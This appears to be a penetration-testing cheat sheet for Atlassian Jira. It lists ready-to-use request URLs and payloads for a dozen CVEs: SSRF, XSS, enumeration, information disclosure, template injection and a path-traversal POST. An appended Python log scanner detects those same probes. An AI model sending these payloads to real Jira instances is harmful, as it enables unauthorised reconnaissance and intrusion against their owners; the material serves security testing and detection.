# Jira Common Bugs
## Introduction
What would you do if you came across a website that uses Jira?
## How to Detect
Send an HTTP request to `https://example.com/secure/Dashboard.jspa` or `https://example.com/login.jsp`; a login form in the response indicates Jira.

1. Find the related CVEs by checking the Jira version
* How to find the Jira version

Request `https://example.com/secure/Dashboard.jspa` and check the page source. You will find a line such as `<meta name="ajs-version-number" content="8.20.9">`, so 8.20.9 is the Jira version. If you find an outdated Jira version, look up its CVEs at [CVEDetails](https://www.cvedetails.com/vulnerability-list/vendor_id-3578/product_id-8170/Atlassian-Jira.html)

Some example CVEs:
- CVE-2017-9506 (SSRF)
```
https://example.com/plugins/servlet/oauth/users/icon-uri?consumerUri=<SSRF_PAYLOAD>
```
- CVE-2018-20824 (XSS)
```
https://example.com/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
```
- CVE-2019-8451 (SSRF)
```
https://example.com/plugins/servlet/gadgets/makeRequest?url=https://<HOST_NAME>:1337@example.com
```
- CVE-2019-8449 (User Information Disclosure)
```
https://example.com/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
```
- CVE-2019-8442 (Sensitive Information Disclosure)
```
https://example.com/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
```
- CVE-2019-3403 (User Enumeration)
```
https://example.com/rest/api/2/user/picker?query=<USERNAME_HERE>
```
- CVE-2020-14181 (User Enumeration)
```
https://example.com/secure/ViewUserHover.jspa?username=<USERNAME>
```
- CVE-2020-14178 (Project Key Enumeration)
```
https://example.com/browse.<PROJECT_KEY>
```
- CVE-2020-14179 (Information Disclosure)
```
https://example.com/secure/QueryComponent!Default.jspa
```
- CVE-2019-11581 (Template Injection)
```
example.com/secure/ContactAdministrators!default.jspa
```
* Try the SSTI payloads
- CVE-2019-3396 (Path Traversal)
```
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Language: en-US,en;q=0.5
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Referer: {{Hostname}}
Content-Length: 168
Connection: close

{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
```
* Try the above request with the Jira target
- CVE-2019-3402 (XSS)
```
https://example.com/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
```
2. Signup enabled
```
POST /servicedesk/customer/user/signup HTTP/1.1
Host: example.com
Content-Type: application/json

{"email":"test@gmail.com","signUpContext":{},"secondaryEmail":"","usingNewUi":true}
```
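
From the defending side, the request paths listed above can be turned into a log check. This is an added example, not part of the original page: it scans web access logs for unauthenticated requests to those paths. The log layout (combined log format with the logged-in user in the third field), the `scan` function, the `signup-enabled` label and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Request paths copied from this page's examples, keyed by the issue each one probes.
SIGNATURES = {
    "CVE-2017-9506": r"/plugins/servlet/oauth/users/icon-uri",
    "CVE-2018-20824": r"/plugins/servlet/Wallboard/?",
    "CVE-2019-8451": r"/plugins/servlet/gadgets/makeRequest",
    "CVE-2019-8449": r"/rest/api/latest/groupuserpicker",
    "CVE-2019-8442": r"/s/[^/]+/_/META-INF/.*",
    "CVE-2019-3403": r"/rest/api/2/user/picker",
    "CVE-2020-14181": r"/secure/ViewUserHover\.jspa",
    "CVE-2020-14178": r"/browse\.[^/]+",
    "CVE-2020-14179": r"/secure/QueryComponent!Default\.jspa",
    "CVE-2019-11581": r"/secure/ContactAdministrators!default\.jspa",
    "CVE-2019-3396": r"/rest/tinymce/1/macro/preview",
    "CVE-2019-3402": r"/secure/ConfigurePortalPages!default\.jspa",
    "signup-enabled": r"/servicedesk/customer/user/signup",
}
COMPILED = {label: re.compile(rx, re.I) for label, rx in SIGNATURES.items()}

# Assumed layout: combined log format; third field is the logged-in user, "-" if none.
LINE = re.compile(r'(\S+) \S+ (\S+) \[[^\]]*\] "\S+ (\S+) [^"]*" \d{3}')

def scan(lines):
    """Map each client IP to the sorted labels its anonymous requests matched."""
    hits = defaultdict(set)
    for line in lines:
        m = LINE.match(line)
        if not m or m.group(2) != "-":
            continue  # unparsable line, or a logged-in user (normal use reaches these paths)
        ip, _user, target = m.groups()
        path = urlsplit(target).path  # drop the query string before matching
        for label, rx in COMPILED.items():
            if rx.fullmatch(path):
                hits[ip].add(label)
    return {ip: sorted(labels) for ip, labels in hits.items()}

# Constructed sample lines (documentation address ranges, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [18/Jun/2022:13:26:55 +0000] "GET /rest/api/latest/groupuserpicker?query=1&maxResults=50000 HTTP/1.1" 200 512',
    '203.0.113.7 - - [18/Jun/2022:13:26:56 +0000] "GET /s/x/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1" 200 900',
    '198.51.100.4 - alice [18/Jun/2022:13:27:01 +0000] "GET /rest/api/2/user/picker?query=bo HTTP/1.1" 200 120',
    '198.51.100.9 - - [18/Jun/2022:13:27:05 +0000] "GET /browse/PROJ-1 HTTP/1.1" 302 0',
    '192.0.2.33 - - [18/Jun/2022:13:27:09 +0000] "GET /browse.PROJ HTTP/1.1" 200 64',
]
print(scan(SAMPLE))
```

A client that matches several labels in a short window is the pattern to alert on; a single match on a path such as the user picker can still be ordinary anonymous browsing on instances that allow it.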
## Reference
* [@harshbothra](https://twitter.com/harshbothra)